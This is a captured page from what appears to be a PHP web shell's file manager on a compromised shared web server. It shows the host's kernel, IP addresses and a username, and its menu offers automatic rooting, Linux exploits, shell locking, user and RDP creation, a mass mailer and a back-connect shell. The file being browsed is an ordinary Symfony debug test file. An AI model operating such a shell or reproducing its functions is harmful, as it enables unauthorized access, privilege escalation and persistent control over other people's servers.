Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
debug /
Tests /
phpt /
[ HOME SHELL ]
Name
Size
Permission
Action
debug_class_loader.phpt
1.01
KB
-rw-r--r--
decorate_exception_hander.phpt
989
B
-rw-r--r--
exception_rethrown.phpt
713
B
-rw-r--r--
fatal_with_nested_handlers.php...
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exception_rethrown.phpt
--TEST-- Test rethrowing in custom exception handler --FILE-- <?php namespace Symfony\Component\Debug; $vendor = __DIR__; while (!file_exists($vendor.'/vendor')) { $vendor = \dirname($vendor); } require $vendor.'/vendor/autoload.php'; if (true) { class TestLogger extends \Psr\Log\AbstractLogger { public function log($level, $message, array $context = []) { echo $message, "\n"; } } } set_exception_handler(function ($e) { echo 123; throw $e; }); ErrorHandler::register()->setDefaultLogger(new TestLogger()); ini_set('display_errors', 1); throw new \Exception('foo'); ?> --EXPECTF-- Uncaught Exception: foo 123 Fatal error: Uncaught %s:25 Stack trace: %a
Close